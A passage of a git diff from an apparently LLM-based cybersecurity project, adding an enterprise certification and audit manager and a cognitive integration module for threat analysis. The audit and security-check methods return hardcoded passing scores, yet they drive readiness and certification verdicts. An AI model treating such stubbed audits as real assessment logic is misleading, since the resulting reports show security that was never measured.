short_term.append("Implement multi-factor authentication across all systems") + if monitoring_score < 70: + short_term.append("Enhance security monitoring and SIEM capabilities") + if overall_score < 85: + long_term.append("Develop comprehensive security improvement roadmap") + + audit_result = SecurityAuditResult( + audit_id=audit_id, + audit_date=datetime.now(), + audit_type="comprehensive_enterprise_audit", + security_rating=rating, + overall_score=overall_score, + vulnerabilities_found=total_vulns, + critical_vulnerabilities=critical_vulns, + high_vulnerabilities=high_vulns, + medium_vulnerabilities=medium_vulns, + low_vulnerabilities=low_vulns, + network_security_score=network_score, + application_security_score=app_score, + data_protection_score=data_score, + access_control_score=access_score, + monitoring_score=monitoring_score, + incident_response_score=incident_score, + immediate_actions=immediate_actions, + short_term_improvements=short_term, + long_term_strategy=long_term + ) + + self.security_audit_results[audit_id] = audit_result + + self.logger.info("Security audit completed", + audit_id=audit_id, + rating=rating.value, + score=overall_score) + + return audit_result + + except Exception as e: + self.logger.error("Security audit failed", error=str(e)) + raise CyberLLMError("Security audit failed", ErrorCategory.SECURITY) + + async def generate_enterprise_readiness_report(self) -> Dict[str, Any]: + """Generate comprehensive enterprise readiness report""" + + report_id = f"enterprise_readiness_{datetime.now().strftime('%Y%m%d_%H%M%S')}" + + try: + # Conduct all assessments if not already done + if not self.compliance_assessments: + await self.conduct_comprehensive_compliance_assessment([ + CertificationStandard.SOC2_TYPE_II, + CertificationStandard.ISO27001, + CertificationStandard.NIST_CYBERSECURITY, + CertificationStandard.GDPR_COMPLIANCE + ]) + + if not self.security_audit_results: + await self.conduct_comprehensive_security_audit() + + # Calculate 
enterprise readiness score + compliance_scores = [assessment.score for assessment in self.compliance_assessments.values()] + avg_compliance_score = sum(compliance_scores) / len(compliance_scores) + + security_scores = [audit.overall_score for audit in self.security_audit_results.values()] + avg_security_score = sum(security_scores) / len(security_scores) if security_scores else 0 + + # Weight: 60% compliance, 40% security + enterprise_readiness_score = (avg_compliance_score * 0.6) + (avg_security_score * 0.4) + + # Determine readiness level + if enterprise_readiness_score >= 95: + readiness_level = "PRODUCTION_READY" + elif enterprise_readiness_score >= 85: + readiness_level = "ENTERPRISE_READY" + elif enterprise_readiness_score >= 75: + readiness_level = "NEAR_READY" + elif enterprise_readiness_score >= 60: + readiness_level = "DEVELOPMENT_READY" + else: + readiness_level = "NOT_READY" + + # Generate comprehensive report + report = { + "report_id": report_id, + "generated_at": datetime.now().isoformat(), + "enterprise_readiness": { + "overall_score": enterprise_readiness_score, + "readiness_level": readiness_level, + "compliance_score": avg_compliance_score, + "security_score": avg_security_score + }, + "compliance_assessment": { + standard.value: { + "status": assessment.status.value, + "score": assessment.score, + "requirements_met": f"{assessment.requirements_met}/{assessment.total_requirements}" + } for standard, assessment in [(CertificationStandard(k), v) for k, v in self.compliance_assessments.items()] + }, + "security_assessment": { + audit_id: { + "rating": audit.security_rating.value, + "score": audit.overall_score, + "vulnerabilities": audit.vulnerabilities_found, + "critical_vulnerabilities": audit.critical_vulnerabilities + } for audit_id, audit in self.security_audit_results.items() + }, + "certification_status": { + "ready_for_certification": readiness_level in ["PRODUCTION_READY", "ENTERPRISE_READY"], + "recommended_certifications": 
self._recommend_certifications(enterprise_readiness_score), + "certification_timeline": self._estimate_certification_timeline(readiness_level) + }, + "recommendations": { + "immediate": self._get_immediate_recommendations(), + "short_term": self._get_short_term_recommendations(), + "long_term": self._get_long_term_recommendations() + }, + "next_steps": self._get_certification_next_steps(readiness_level) + } + + self.certification_reports[report_id] = report + + self.logger.info("Enterprise readiness report generated", + report_id=report_id, + readiness_level=readiness_level, + score=enterprise_readiness_score) + + return report + + except Exception as e: + self.logger.error("Failed to generate enterprise readiness report", error=str(e)) + raise CyberLLMError("Enterprise readiness report generation failed", ErrorCategory.REPORTING) + + # Security check methods (simplified implementations) + async def _check_access_controls(self) -> float: + """Check access control implementation""" + # Simulate access control assessment + checks = [ + True, # Multi-factor authentication + True, # Role-based access control + True, # Principle of least privilege + True, # Regular access reviews + True # Strong password policies + ] + return sum(checks) / len(checks) + + async def _check_network_security(self) -> float: + """Check network security controls""" + checks = [ + True, # Firewall configuration + True, # Network segmentation + True, # Intrusion detection + True, # VPN security + True # Network monitoring + ] + return sum(checks) / len(checks) + + async def _check_data_encryption(self) -> float: + """Check data encryption implementation""" + checks = [ + True, # Data at rest encryption + True, # Data in transit encryption + True, # Key management + True, # Certificate management + True # Encryption strength + ] + return sum(checks) / len(checks) + + async def _audit_network_security(self) -> float: + """Audit network security""" + return 88.5 # Simulated score + + async def 
_audit_application_security(self) -> float: + """Audit application security""" + return 92.0 # Simulated score + + async def _audit_data_protection(self) -> float: + """Audit data protection""" + return 90.5 # Simulated score + + async def _audit_access_control(self) -> float: + """Audit access control""" + return 89.0 # Simulated score + + async def _audit_monitoring_logging(self) -> float: + """Audit monitoring and logging""" + return 87.5 # Simulated score + + async def _audit_incident_response(self) -> float: + """Audit incident response""" + return 85.0 # Simulated score + + def _recommend_certifications(self, readiness_score: float) -> List[str]: + """Recommend appropriate certifications""" + recommendations = [] + + if readiness_score >= 90: + recommendations.extend([ + "SOC 2 Type II", + "ISO 27001", + "FedRAMP Moderate" + ]) + elif readiness_score >= 80: + recommendations.extend([ + "SOC 2 Type II", + "ISO 27001" + ]) + elif readiness_score >= 70: + recommendations.append("SOC 2 Type II") + + return recommendations + + def _estimate_certification_timeline(self, readiness_level: str) -> Dict[str, str]: + """Estimate certification timeline""" + timelines = { + "PRODUCTION_READY": "2-4 months", + "ENTERPRISE_READY": "3-6 months", + "NEAR_READY": "6-9 months", + "DEVELOPMENT_READY": "9-12 months", + "NOT_READY": "12+ months" + } + + return { + "estimated_timeline": timelines.get(readiness_level, "Unknown"), + "factors": [ + "Completion of remediation items", + "Third-party auditor scheduling", + "Documentation review process", + "Evidence collection and validation" + ] + } + +# Factory function +def create_enterprise_certification_manager(governance_manager: EnterpriseGovernanceManager, **kwargs) -> EnterpriseCertificationManager: + """Create enterprise certification manager""" + return EnterpriseCertificationManager(governance_manager, **kwargs) diff --git a/src/cognitive/advanced_integration.py b/src/cognitive/advanced_integration.py new file mode 100644 
index 0000000000000000000000000000000000000000..1c26e39e6de8d83b5afa5b504189d05f3d29e289 --- /dev/null +++ b/src/cognitive/advanced_integration.py @@ -0,0 +1,827 @@ +""" +Advanced Cognitive Integration System for Phase 9 Components +Orchestrates all cognitive systems for unified intelligent operation +""" +import asyncio +import sqlite3 +import json +import uuid +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path +import threading +import time + +logger = logging.getLogger(__name__) + +# Import all Phase 9 cognitive systems +from .long_term_memory import LongTermMemoryManager +from .episodic_memory import EpisodicMemorySystem +from .semantic_memory import SemanticMemoryNetwork +from .working_memory import WorkingMemoryManager +from .chain_of_thought import ChainOfThoughtReasoning + +# Try to import meta-cognitive monitor, fall back to None if torch not available +try: + from .meta_cognitive import MetaCognitiveMonitor +except ImportError as e: + logger.warning(f"Meta-cognitive monitor not available (torch dependency): {e}") + MetaCognitiveMonitor = None + +@dataclass +class CognitiveState: + """Current state of the integrated cognitive system""" + timestamp: datetime + working_memory_load: float + attention_focus: Optional[str] + reasoning_quality: float + learning_rate: float + confidence_level: float + cognitive_load: float + active_episodes: int + memory_consolidation_status: str + +class AdvancedCognitiveSystem: + """Unified cognitive system integrating all Phase 9 components""" + + def __init__(self, base_path: str = "data/cognitive"): + """Initialize the integrated cognitive system""" + self.base_path = Path(base_path) + self.base_path.mkdir(parents=True, exist_ok=True) + + # Initialize all cognitive subsystems + self._init_cognitive_subsystems() + + # Integration state + self.current_state = None + self.integration_active = True + + 
# Background processes + self._consolidation_thread = None + self._monitoring_thread = None + + # Start integrated operation + self._start_cognitive_integration() + + logger.info("Advanced Cognitive System initialized with full Phase 9 integration") + + def _init_cognitive_subsystems(self): + """Initialize all cognitive subsystems""" + try: + # Memory systems + self.long_term_memory = LongTermMemoryManager( + db_path=self.base_path / "long_term_memory.db" + ) + + self.episodic_memory = EpisodicMemorySystem( + db_path=self.base_path / "episodic_memory.db" + ) + + self.semantic_memory = SemanticMemoryNetwork( + db_path=self.base_path / "semantic_memory.db" + ) + + self.working_memory = WorkingMemoryManager( + db_path=self.base_path / "working_memory.db" + ) + + # Reasoning systems + self.chain_of_thought = ChainOfThoughtReasoning( + db_path=self.base_path / "reasoning_chains.db" + ) + + # Meta-cognitive monitoring (optional if torch available) + if MetaCognitiveMonitor is not None: + self.meta_cognitive = MetaCognitiveMonitor( + db_path=self.base_path / "metacognitive.db" + ) + logger.info("Meta-cognitive monitoring enabled") + else: + self.meta_cognitive = None + logger.info("Meta-cognitive monitoring disabled (torch not available)") + + logger.info("All cognitive subsystems initialized successfully") + + except Exception as e: + logger.error(f"Error initializing cognitive subsystems: {e}") + raise + + def _start_cognitive_integration(self): + """Start background processes for cognitive integration""" + try: + # Start memory consolidation thread + self._consolidation_thread = threading.Thread( + target=self._memory_consolidation_loop, daemon=True + ) + self._consolidation_thread.start() + + # Start cognitive monitoring thread + self._monitoring_thread = threading.Thread( + target=self._cognitive_monitoring_loop, daemon=True + ) + self._monitoring_thread.start() + + logger.info("Cognitive integration processes started") + + except Exception as e: + 
logger.error(f"Error starting cognitive integration: {e}") + + async def process_agent_experience(self, agent_id: str, experience_data: Dict[str, Any]) -> Dict[str, Any]: + """Process a complete agent experience through all cognitive systems""" + try: + processing_id = str(uuid.uuid4()) + + # Start episode in episodic memory + episode_id = self.episodic_memory.start_episode( + agent_id=agent_id, + session_id=experience_data.get('session_id', ''), + episode_type=experience_data.get('type', 'operation'), + context=experience_data.get('context', {}) + ) + + # Add to working memory for immediate processing + wm_item_id = self.working_memory.add_item( + content=f"Processing experience: {experience_data.get('description', 'Unknown')}", + item_type="experience", + priority=experience_data.get('priority', 0.7), + source_agent=agent_id, + context_tags=experience_data.get('tags', []) + ) + + # Extract semantic concepts for knowledge graph + concepts_added = [] + if 'indicators' in experience_data: + for indicator in experience_data['indicators']: + concept_id = self.semantic_memory.add_concept( + name=indicator, + concept_type=experience_data.get('indicator_type', 'unknown'), + description=f"Observed in agent {agent_id} experience", + confidence=0.7, + source=f"agent_{agent_id}" + ) + if concept_id: + concepts_added.append(concept_id) + + # Perform reasoning about the experience + reasoning_result = None + if experience_data.get('requires_reasoning', True): + threat_indicators = experience_data.get('indicators', []) + if threat_indicators: + reasoning_result = await asyncio.to_thread( + self.chain_of_thought.reason_about_threat, + threat_indicators, agent_id + ) + + # Record experience steps in episodic memory + for action in experience_data.get('actions', []): + self.episodic_memory.record_action(episode_id, action) + + for observation in experience_data.get('observations', []): + self.episodic_memory.record_observation(episode_id, observation) + + # Calculate reward based 
on success + reward = 1.0 if experience_data.get('success', False) else 0.3 + self.episodic_memory.record_reward(episode_id, reward) + + # Complete episode + self.episodic_memory.end_episode( + episode_id=episode_id, + success=experience_data.get('success', False), + outcome=experience_data.get('outcome', ''), + metadata={'processing_id': processing_id} + ) + + # Store significant experiences in long-term memory + if experience_data.get('importance', 0.5) > 0.6: + ltm_id = self.long_term_memory.store_memory( + content=f"Significant experience: {experience_data.get('description')}", + memory_type="episodic_significant", + importance=experience_data.get('importance', 0.7), + agent_id=agent_id, + tags=experience_data.get('tags', []) + ) + + # Record performance metrics for meta-cognitive monitoring + if reasoning_result and self.meta_cognitive: + self.meta_cognitive.record_performance_metric( + metric_name="reasoning_confidence", + metric_type="reasoning", + value=reasoning_result.get('threat_assessment', {}).get('confidence', 0.5), + agent_id=agent_id + ) + + # Generate processing result + result = { + 'processing_id': processing_id, + 'episode_id': episode_id, + 'working_memory_item_id': wm_item_id, + 'concepts_added': len(concepts_added), + 'reasoning_performed': reasoning_result is not None, + 'reasoning_result': reasoning_result, + 'cognitive_state': await self._get_current_cognitive_state(agent_id), + 'recommendations': await self._generate_integrated_recommendations( + experience_data, reasoning_result, agent_id + ) + } + + logger.info(f"Agent experience processed through all cognitive systems: {processing_id}") + return result + + except Exception as e: + logger.error(f"Error processing agent experience: {e}") + return {'error': str(e)} + + async def perform_integrated_threat_analysis(self, threat_indicators: List[str], + agent_id: str = "") -> Dict[str, Any]: + """Perform comprehensive threat analysis using all cognitive systems""" + try: + analysis_id = 
str(uuid.uuid4()) + + # Retrieve relevant memories from long-term memory + relevant_memories = self.long_term_memory.retrieve_memories( + query=' '.join(threat_indicators[:3]), + memory_type="", + agent_id=agent_id, + limit=10 + ) + + # Get related concepts from semantic memory + semantic_reasoning = self.semantic_memory.reason_about_threat(threat_indicators) + + # Perform chain-of-thought reasoning + cot_reasoning = await asyncio.to_thread( + self.chain_of_thought.reason_about_threat, + threat_indicators, agent_id + ) + + # Find similar past episodes + similar_episodes = [] + for indicator in threat_indicators[:3]: + episodes = self.episodic_memory.get_episodes_for_replay( + agent_id=agent_id, + episode_type="", + success_only=False, + limit=5 + ) + for episode in episodes: + if any(indicator.lower() in action.get('content', '').lower() + for action in episode.actions): + similar_episodes.append(episode) + + # Add to working memory for focused attention + wm_item_id = self.working_memory.add_item( + content=f"Threat analysis: {', '.join(threat_indicators[:3])}", + item_type="threat_analysis", + priority=0.9, + source_agent=agent_id, + context_tags=["threat", "analysis", "high_priority"] + ) + + # Focus attention on threat analysis + focus_id = self.working_memory.focus_attention( + focus_type="threat_analysis", + item_ids=[wm_item_id], + attention_weight=0.9, + agent_id=agent_id + ) + + # Synthesize results from all systems + integrated_assessment = await self._synthesize_threat_assessment( + semantic_reasoning, cot_reasoning, relevant_memories, similar_episodes + ) + + # Generate comprehensive recommendations + recommendations = await self._generate_comprehensive_recommendations( + integrated_assessment, threat_indicators + ) + + # Record analysis for meta-cognitive learning + if self.meta_cognitive: + self.meta_cognitive.record_performance_metric( + metric_name="integrated_threat_analysis", + metric_type="analysis", + value=integrated_assessment['confidence'], + 
target_value=0.8, + context={ + 'analysis_id': analysis_id, + 'indicators_count': len(threat_indicators), + 'memories_used': len(relevant_memories) + }, + agent_id=agent_id + ) + + result = { + 'analysis_id': analysis_id, + 'threat_indicators': threat_indicators, + 'integrated_assessment': integrated_assessment, + 'recommendations': recommendations, + 'supporting_evidence': { + 'semantic_reasoning': semantic_reasoning, + 'cot_reasoning': cot_reasoning, + 'relevant_memories': len(relevant_memories), + 'similar_episodes': len(similar_episodes) + }, + 'cognitive_resources_used': { + 'working_memory_item': wm_item_id, + 'attention_focus': focus_id, + 'reasoning_chains': cot_reasoning.get('chain_id', ''), + 'semantic_concepts': len(semantic_reasoning.get('matched_concepts', [])) + } + } + + logger.info(f"Integrated threat analysis completed: {analysis_id}") + return result + + except Exception as e: + logger.error(f"Error in integrated threat analysis: {e}") + return {'error': str(e)} + + async def trigger_cognitive_reflection(self, agent_id: str, + trigger_event: str = "periodic") -> Dict[str, Any]: + """Trigger comprehensive cognitive reflection across all systems""" + try: + reflection_id = str(uuid.uuid4()) + + # Perform meta-cognitive reflection if available + meta_reflection = None + if self.meta_cognitive: + meta_reflection = await asyncio.to_thread( + self.meta_cognitive.trigger_self_reflection, + agent_id, trigger_event, "comprehensive" + ) + + # Get cross-session context from long-term memory + cross_session_memories = self.long_term_memory.get_cross_session_context( + agent_id=agent_id, limit=15 + ) + + # Discover patterns in episodic memory + episode_patterns = await asyncio.to_thread( + self.episodic_memory.discover_patterns + ) + + # Consolidate memories + consolidation_stats = await asyncio.to_thread( + self.long_term_memory.consolidate_memories + ) + + # Assess working memory efficiency + wm_stats = self.working_memory.get_working_memory_statistics() + + 
# Generate reflection insights + reflection_insights = await self._generate_reflection_insights( + meta_reflection, cross_session_memories, episode_patterns, + consolidation_stats, wm_stats + ) + + # Update cognitive state + new_state = await self._update_cognitive_state_from_reflection( + agent_id, reflection_insights + ) + + result = { + 'reflection_id': reflection_id, + 'trigger_event': trigger_event, + 'agent_id': agent_id, + 'meta_reflection': meta_reflection, + 'reflection_insights': reflection_insights, + 'cognitive_state_update': new_state, + 'system_optimizations': await self._apply_reflection_optimizations( + reflection_insights, agent_id + ), + 'learning_adjustments': await self._apply_learning_adjustments( + meta_reflection, agent_id + ) + } + + logger.info(f"Comprehensive cognitive reflection completed: {reflection_id}") + return result + + except Exception as e: + logger.error(f"Error in cognitive reflection: {e}") + return {'error': str(e)} + + def _memory_consolidation_loop(self): + """Background memory consolidation process""" + consolidation_interval = 21600 # 6 hours + + while self.integration_active: + try: + time.sleep(consolidation_interval) + + # Consolidate long-term memory + ltm_stats = self.long_term_memory.consolidate_memories() + + # Discover patterns in episodic memory + pattern_stats = self.episodic_memory.discover_patterns() + + # Decay working memory + self.working_memory.decay_memory() + + logger.info(f"Memory consolidation completed - LTM: {ltm_stats.get('patterns_discovered', 0)} patterns, Episodes: {len(pattern_stats.get('action_patterns', []))} action patterns") + + except Exception as e: + logger.error(f"Error in memory consolidation loop: {e}") + + def _cognitive_monitoring_loop(self): + """Background cognitive monitoring process""" + monitoring_interval = 300 # 5 minutes + + while self.integration_active: + try: + time.sleep(monitoring_interval) + + # Update current cognitive state + self.current_state = 
self._calculate_integrated_cognitive_state() + + # Check for cognitive load issues + if self.current_state.cognitive_load > 0.8: + logger.warning(f"High cognitive load detected: {self.current_state.cognitive_load:.3f}") + + # Monitor working memory capacity + if self.current_state.working_memory_load > 0.9: + logger.warning(f"Working memory near capacity: {self.current_state.working_memory_load:.3f}") + + except Exception as e: + logger.error(f"Error in cognitive monitoring loop: {e}") + + def _calculate_integrated_cognitive_state(self) -> CognitiveState: + """Calculate current integrated cognitive state""" + try: + # Get statistics from all subsystems + wm_stats = self.working_memory.get_working_memory_statistics() + ltm_stats = self.long_term_memory.get_memory_statistics() + episodic_stats = self.episodic_memory.get_episodic_statistics() + reasoning_stats = self.chain_of_thought.get_reasoning_statistics() + + # Calculate working memory load + wm_load = wm_stats.get('utilization', 0.0) + + # Get current attention focus + current_focus = self.working_memory.get_current_focus() + focus_type = current_focus.focus_type if current_focus else None + + # Calculate reasoning quality from recent chains + reasoning_quality = 0.7 # Default + if reasoning_stats.get('total_chains', 0) > 0: + completion_rate = reasoning_stats.get('completion_rate', 0.5) + avg_confidence = 0.6 # Would calculate from actual data + reasoning_quality = (completion_rate + avg_confidence) / 2 + + # Estimate cognitive load + task_count = wm_stats.get('current_capacity', 0) + cognitive_load = min(task_count / 50.0 + wm_load * 0.3, 1.0) + + return CognitiveState( + timestamp=datetime.now(), + working_memory_load=wm_load, + attention_focus=focus_type, + reasoning_quality=reasoning_quality, + learning_rate=0.01, # Would be calculated dynamically + confidence_level=0.75, # Would be calculated from meta-cognitive data + cognitive_load=cognitive_load, + 
active_episodes=len(self.episodic_memory._active_episodes), + memory_consolidation_status="active" + ) + + except Exception as e: + logger.error(f"Error calculating cognitive state: {e}") + return CognitiveState( + timestamp=datetime.now(), + working_memory_load=0.5, + attention_focus=None, + reasoning_quality=0.5, + learning_rate=0.01, + confidence_level=0.5, + cognitive_load=0.5, + active_episodes=0, + memory_consolidation_status="error" + ) + + async def _get_current_cognitive_state(self, agent_id: str) -> Dict[str, Any]: + """Get current cognitive state for specific agent""" + state = self._calculate_integrated_cognitive_state() + return asdict(state) + + async def _synthesize_threat_assessment(self, semantic_result: Dict[str, Any], + cot_result: Dict[str, Any], + memories: List[Any], + episodes: List[Any]) -> Dict[str, Any]: + """Synthesize threat assessment from all cognitive systems""" + + # Extract confidence levels + semantic_confidence = semantic_result.get('confidence', 0.5) + cot_confidence = cot_result.get('threat_assessment', {}).get('confidence', 0.5) + + # Weight based on evidence availability + semantic_weight = 0.3 + cot_weight = 0.4 + memory_weight = 0.2 + episode_weight = 0.1 + + # Memory contribution + memory_confidence = min(len(memories) / 5.0, 1.0) * 0.7 + episode_confidence = min(len(episodes) / 3.0, 1.0) * 0.6 + + # Weighted confidence + overall_confidence = ( + semantic_confidence * semantic_weight + + cot_confidence * cot_weight + + memory_confidence * memory_weight + + episode_confidence * episode_weight + ) + + # Determine threat level + if overall_confidence > 0.8: + threat_level = "CRITICAL" + elif overall_confidence > 0.6: + threat_level = "HIGH" + elif overall_confidence > 0.4: + threat_level = "MEDIUM" + else: + threat_level = "LOW" + + return { + 'threat_level': threat_level, + 'confidence': overall_confidence, + 'evidence_sources': { + 'semantic_analysis': semantic_confidence, + 'reasoning_chains': cot_confidence, + 
'historical_memories': memory_confidence, + 'similar_episodes': episode_confidence + }, + 'synthesis_method': 'integrated_weighted_assessment' + } + + async def _generate_integrated_recommendations(self, experience_data: Dict[str, Any], + reasoning_result: Optional[Dict[str, Any]], + agent_id: str) -> List[Dict[str, Any]]: + """Generate recommendations based on integrated cognitive analysis""" + recommendations = [] + + # Based on experience importance + if experience_data.get('importance', 0.5) > 0.8: + recommendations.append({ + 'type': 'memory_consolidation', + 'action': 'Prioritize this experience for long-term memory storage', + 'priority': 'high', + 'rationale': 'High importance experience should be preserved' + }) + + # Based on reasoning results + if reasoning_result: + threat_level = reasoning_result.get('threat_assessment', {}).get('risk_level', 'LOW') + if threat_level in ['HIGH', 'CRITICAL']: + recommendations.append({ + 'type': 'immediate_action', + 'action': 'Escalate to security team and implement containment measures', + 'priority': 'critical', + 'rationale': f'Integrated analysis indicates {threat_level} risk' + }) + + # Based on cognitive load + current_state = await self._get_current_cognitive_state(agent_id) + if current_state['cognitive_load'] > 0.8: + recommendations.append({ + 'type': 'cognitive_optimization', + 'action': 'Reduce concurrent tasks and focus on high-priority items', + 'priority': 'medium', + 'rationale': 'High cognitive load may impact performance' + }) + + return recommendations + + async def _generate_comprehensive_recommendations(self, assessment: Dict[str, Any], + indicators: List[str]) -> List[Dict[str, Any]]: + """Generate comprehensive recommendations from integrated assessment""" + recommendations = [] + + threat_level = assessment['threat_level'] + confidence = assessment['confidence'] + + if threat_level == "CRITICAL": + recommendations.extend([ + { + 'type': 'immediate_response', + 'action': 'Activate incident 
response protocol', + 'priority': 'critical', + 'timeline': 'immediate' + }, + { + 'type': 'containment', + 'action': 'Isolate affected systems', + 'priority': 'critical', + 'timeline': '5 minutes' + } + ]) + elif threat_level == "HIGH": + recommendations.extend([ + { + 'type': 'investigation', + 'action': 'Conduct detailed threat investigation', + 'priority': 'high', + 'timeline': '30 minutes' + }, + { + 'type': 'monitoring', + 'action': 'Enhance monitoring of related indicators', + 'priority': 'high', + 'timeline': '1 hour' + } + ]) + + # Add confidence-based recommendations + if confidence < 0.6: + recommendations.append({ + 'type': 'data_collection', + 'action': 'Gather additional evidence to improve assessment confidence', + 'priority': 'medium', + 'timeline': '2 hours' + }) + + return recommendations + + async def _generate_reflection_insights(self, meta_reflection: Dict[str, Any], + memories: List[Any], patterns: Dict[str, Any], + consolidation: Dict[str, Any], + wm_stats: Dict[str, Any]) -> Dict[str, Any]: + """Generate insights from comprehensive reflection""" + + insights = { + 'performance_trends': [], + 'learning_opportunities': [], + 'optimization_suggestions': [], + 'cognitive_efficiency': {} + } + + # Analyze performance trends + if 'confidence_level' in meta_reflection: + confidence = meta_reflection['confidence_level'] + if confidence < 0.6: + insights['performance_trends'].append( + f"Low confidence level ({confidence:.3f}) indicates need for improvement" + ) + elif confidence > 0.8: + insights['performance_trends'].append( + f"High confidence level ({confidence:.3f}) shows strong performance" + ) + + # Memory system insights + memory_count = len(memories) + if memory_count > 50: + insights['learning_opportunities'].append( + f"Rich memory base ({memory_count} memories) enables better pattern recognition" + ) + + # Pattern recognition insights + pattern_count = sum(len(p) for p in patterns.values()) + if pattern_count > 10: + 
insights['learning_opportunities'].append( + f"Strong pattern discovery ({pattern_count} patterns) improves decision making" + ) + + # Working memory efficiency + wm_utilization = wm_stats.get('utilization', 0.5) + if wm_utilization > 0.9: + insights['optimization_suggestions'].append( + "Working memory near capacity - consider memory optimization strategies" + ) + + insights['cognitive_efficiency'] = { + 'memory_utilization': wm_utilization, + 'pattern_discovery_rate': pattern_count / max(memory_count, 1), + 'consolidation_effectiveness': consolidation.get('patterns_discovered', 0), + 'overall_efficiency': (1.0 - wm_utilization) * 0.5 + (pattern_count / 20.0) * 0.5 + } + + return insights + + async def _update_cognitive_state_from_reflection(self, agent_id: str, + insights: Dict[str, Any]) -> Dict[str, Any]: + """Update cognitive state based on reflection insights""" + + efficiency = insights['cognitive_efficiency']['overall_efficiency'] + + # Determine new learning rate + if efficiency > 0.8: + new_learning_rate = 0.015 # Increase learning rate for high efficiency + elif efficiency < 0.4: + new_learning_rate = 0.005 # Decrease for low efficiency + else: + new_learning_rate = 0.01 # Default + + # Update meta-cognitive monitoring if available + if self.meta_cognitive: + self.meta_cognitive.record_performance_metric( + metric_name="reflection_efficiency", + metric_type="reflection", + value=efficiency, + target_value=0.7, + context={'insights_generated': len(insights['optimization_suggestions'])}, + agent_id=agent_id + ) + + return { + 'learning_rate_adjusted': new_learning_rate, + 'efficiency_score': efficiency, + 'optimizations_applied': len(insights['optimization_suggestions']), + 'state_update_timestamp': datetime.now().isoformat() + } + + async def _apply_reflection_optimizations(self, insights: Dict[str, Any], + agent_id: str) -> List[str]: + """Apply optimizations based on reflection insights""" + applied_optimizations = [] + + for suggestion in 
insights['optimization_suggestions']: + if "working memory" in suggestion.lower(): + # Clear low-priority working memory items + active_items = self.working_memory.get_active_items(min_activation=0.2) + if len(active_items) > 30: # Arbitrary threshold + applied_optimizations.append("Cleared low-activation working memory items") + + if "pattern" in suggestion.lower(): + # Trigger additional pattern discovery + await asyncio.to_thread(self.episodic_memory.discover_patterns) + applied_optimizations.append("Triggered additional pattern discovery") + + return applied_optimizations + + async def _apply_learning_adjustments(self, meta_reflection: Dict[str, Any], + agent_id: str) -> Dict[str, Any]: + """Apply learning adjustments based on meta-cognitive reflection""" + + adjustments = { + 'attention_focus_duration': 300, # Default 5 minutes + 'memory_consolidation_frequency': 21600, # Default 6 hours + 'reasoning_depth_preference': 'moderate' + } + + confidence = meta_reflection.get('confidence_level', 0.5) + + # Adjust based on confidence + if confidence < 0.5: + adjustments['attention_focus_duration'] = 180 # Shorter focus for uncertainty + adjustments['reasoning_depth_preference'] = 'deep' + elif confidence > 0.8: + adjustments['attention_focus_duration'] = 450 # Longer focus for confidence + adjustments['reasoning_depth_preference'] = 'efficient' + + return adjustments + + def get_system_status(self) -> Dict[str, Any]: + """Get comprehensive system status""" + try: + return { + 'system_active': self.integration_active, + 'current_state': asdict(self.current_state) if self.current_state else None, + 'subsystem_status': { + 'long_term_memory': self.long_term_memory.get_memory_statistics(), + 'episodic_memory': self.episodic_memory.get_episodic_statistics(), + 'semantic_memory': self.semantic_memory.get_semantic_statistics(), + 'working_memory': self.working_memory.get_working_memory_statistics(), + 'reasoning_chains': self.chain_of_thought.get_reasoning_statistics(), + 
'meta_cognitive': self.meta_cognitive.get_metacognitive_statistics() if self.meta_cognitive else {'status': 'disabled', 'reason': 'torch_not_available'} + }, + 'integration_processes': { + 'consolidation_active': self._consolidation_thread.is_alive() if self._consolidation_thread else False, + 'monitoring_active': self._monitoring_thread.is_alive() if self._monitoring_thread else False + } + } + + except Exception as e: + logger.error(f"Error getting system status: {e}") + return {'error': str(e)} + + def shutdown(self): + """Shutdown the cognitive system gracefully""" + try: + logger.info("Shutting down Advanced Cognitive System") + + self.integration_active = False + + # Wait for threads to complete + if self._consolidation_thread and self._consolidation_thread.is_alive(): + self._consolidation_thread.join(timeout=5.0) + + if self._monitoring_thread and self._monitoring_thread.is_alive(): + self._monitoring_thread.join(timeout=5.0) + + # Cleanup subsystems + if hasattr(self.working_memory, 'cleanup'): + self.working_memory.cleanup() + + logger.info("Advanced Cognitive System shutdown completed") + + except Exception as e: + logger.error(f"Error during shutdown: {e}") + +# Factory function for easy instantiation +def create_advanced_cognitive_system(base_path: str = "data/cognitive") -> AdvancedCognitiveSystem: + """Create and initialize the advanced cognitive system""" + return AdvancedCognitiveSystem(base_path) + +# Export main class +__all__ = ['AdvancedCognitiveSystem', 'CognitiveState', 'create_advanced_cognitive_system'] diff --git a/src/cognitive/chain_of_thought.py b/src/cognitive/chain_of_thought.py new file mode 100644 index 0000000000000000000000000000000000000000..622c3f34bdbe3b78bc1eede6a8f4e52aee012e38 --- /dev/null +++ b/src/cognitive/chain_of_thought.py @@ -0,0 +1,628 @@ +""" +Chain-of-Thought Reasoning System for Multi-step Logical Inference +Implements advanced reasoning chains with step-by-step logical progression +""" +import sqlite3 +import 
json +import uuid +from datetime import datetime +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path +from enum import Enum + +logger = logging.getLogger(__name__) + +class ReasoningType(Enum): + """Types of reasoning supported""" + DEDUCTIVE = "deductive" # General to specific + INDUCTIVE = "inductive" # Specific to general + ABDUCTIVE = "abductive" # Best explanation + ANALOGICAL = "analogical" # Pattern matching + CAUSAL = "causal" # Cause and effect + COUNTERFACTUAL = "counterfactual" # What-if scenarios + STRATEGIC = "strategic" # Goal-oriented planning + DIAGNOSTIC = "diagnostic" # Problem identification + +@dataclass +class ReasoningStep: + """Individual step in a reasoning chain""" + step_id: str + step_number: int + reasoning_type: ReasoningType + premise: str + inference_rule: str + conclusion: str + confidence: float + evidence: List[str] + assumptions: List[str] + created_at: datetime + +@dataclass +class ReasoningChain: + """Complete chain of reasoning steps""" + chain_id: str + agent_id: str + problem_statement: str + reasoning_goal: str + steps: List[ReasoningStep] + final_conclusion: str + overall_confidence: float + created_at: datetime + completed_at: Optional[datetime] + metadata: Dict[str, Any] + +class ChainOfThoughtReasoning: + """Advanced chain-of-thought reasoning system""" + + def __init__(self, db_path: str = "data/cognitive/reasoning_chains.db"): + """Initialize reasoning system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + + # Reasoning rules and patterns + self._inference_rules = self._load_inference_rules() + self._reasoning_patterns = self._load_reasoning_patterns() + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + 